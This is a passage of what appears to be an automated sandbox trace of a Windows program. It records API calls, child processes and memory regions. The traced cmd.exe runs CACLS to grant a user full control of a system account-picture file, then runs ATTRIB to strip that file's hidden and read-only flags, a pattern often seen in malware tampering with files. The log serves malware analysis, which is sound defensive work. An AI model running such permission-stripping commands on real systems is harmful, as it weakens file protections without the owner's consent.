_String2="DEL") returned -1 [0192.012] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0192.012] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0192.012] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0192.013] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0192.013] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0192.013] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0192.013] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0192.013] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0192.013] _wcsicmp (_String1="CACLS", 
_String2="START") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0192.013] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0192.013] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0192.013] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0192.013] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0192.013] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0192.013] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0192.013] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0192.014] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0192.014] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0192.014] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0192.014] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0192.014] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0192.014] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0192.014] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0192.014] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0192.014] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0192.014] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0192.014] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0192.014] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0192.014] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0192.014] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0192.014] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0192.014] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0192.014] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0192.014] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0192.015] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0192.015] SetErrorMode (uMode=0x0) returned 0x0 [0192.015] SetErrorMode (uMode=0x1) 
returned 0x0 [0192.015] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe1e98, lpFilePart=0x2cf084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf084*="Desktop") returned 0x18 [0192.015] SetErrorMode (uMode=0x0) returned 0x1 [0192.015] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.015] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.021] GetLastError () returned 0x2 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.021] GetLastError () returned 0x2 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xe2180 [0192.022] FindClose (in: hFindFile=0xe2180 | out: hFindFile=0xe2180) returned 1 [0192.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.022] GetLastError () returned 0x2 [0192.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee00, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xe2180 [0192.022] FindClose (in: hFindFile=0xe2180 | out: hFindFile=0xe2180) returned 1 [0192.022] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.022] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.022] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.022] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf248 | out: lpAttributeList=0x2cf180, lpSize=0x2cf248) returned 1 [0192.022] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf180, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf180, lpPreviousValue=0x0) returned 1 [0192.022] GetStartupInfoW (in: lpStartupInfo=0x2cf13c | out: lpStartupInfo=0x2cf13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.023] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.024] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf228 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2cf228*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa9c, dwThreadId=0x9a0)) returned 1 [0192.026] CloseHandle (hObject=0x4c) returned 1 [0192.026] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.026] GetEnvironmentStringsW () returned 0xe0308* [0192.026] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0192.026] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0192.226] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf11c | out: lpExitCode=0x2cf11c*=0x0) returned 1 [0192.226] CloseHandle (hObject=0x50) returned 1 [0192.226] _vsnwprintf (in: _Buffer=0x2cf264, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf128 | out: _Buffer="00000000") returned 8 [0192.226] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0192.226] GetEnvironmentStringsW () returned 0xe2410* [0192.226] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.227] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0192.227] GetEnvironmentStringsW () returned 0xe2410* [0192.227] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.227] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf180 | out: lpAttributeList=0x2cf180) [0192.227] GetConsoleTitleW (in: lpConsoleTitle=0x2cf564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.227] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.227] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.228] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.228] GetLastError () returned 0x2 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.228] GetLastError () returned 0x2 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xde4d8 [0192.228] FindClose (in: hFindFile=0xde4d8 | out: hFindFile=0xde4d8) returned 1 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.229] GetLastError () returned 0x2 [0192.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xde4d8 [0192.229] FindClose (in: hFindFile=0xde4d8 | out: hFindFile=0xde4d8) returned 1 [0192.229] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.229] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.229] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.229] InitializeProcThreadAttributeList 
(in: lpAttributeList=0x2cf180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf248 | out: lpAttributeList=0x2cf180, lpSize=0x2cf248) returned 1 [0192.229] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf180, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf180, lpPreviousValue=0x0) returned 1 [0192.229] GetStartupInfoW (in: lpStartupInfo=0x2cf13c | out: lpStartupInfo=0x2cf13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.229] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.229] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf228 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessInformation=0x2cf228*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb18, dwThreadId=0xa68)) returned 1 [0192.231] CloseHandle (hObject=0x50) returned 1 [0192.231] 
SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.231] GetEnvironmentStringsW () returned 0xe2410* [0192.231] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.231] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0192.404] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf11c | out: lpExitCode=0x2cf11c*=0x0) returned 1 [0192.404] CloseHandle (hObject=0x4c) returned 1 [0192.404] _vsnwprintf (in: _Buffer=0x2cf264, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf128 | out: _Buffer="00000000") returned 8 [0192.404] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0192.404] GetEnvironmentStringsW () returned 0xe2410* [0192.404] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.404] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0192.405] GetEnvironmentStringsW () returned 0xe2410* [0192.405] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.405] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf180 | out: lpAttributeList=0x2cf180) [0192.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.405] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.405] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.405] SetConsoleInputExeNameW () returned 0x1 [0192.405] GetConsoleOutputCP () returned 0x1b5 [0192.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.405] exit (_Code=0) Process: id = "433" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = 
"0x60800000" monitor_reason = "child_process" parent_id = "432" os_parent_pid = "0xa90" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28235 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28236 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28237 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28238 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 28239 start_va = 0x9d0000 end_va = 0x9d8fff entry_point = 0x9d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28240 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28241 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28242 start_va = 
0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28244 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28245 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28246 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28247 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28248 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28249 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28250 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28251 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28252 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28253 start_va = 0x769f0000 end_va 
= 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28254 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28255 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28256 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 623 os_tid = 0x9a0 Thread: id = 624 os_tid = 0xdd8 Process: id = "434" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "432" os_parent_pid = "0xa90" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28263 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28264 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" 
filename = "" Region: id = 28265 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28266 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28267 start_va = 0x280000 end_va = 0x286fff entry_point = 0x280000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28268 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28269 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28271 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28272 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28273 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28274 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28275 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: 
id = 28276 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 28277 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28278 start_va = 0x6de90000 end_va = 0x6deacfff entry_point = 0x6de90000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28279 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28280 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 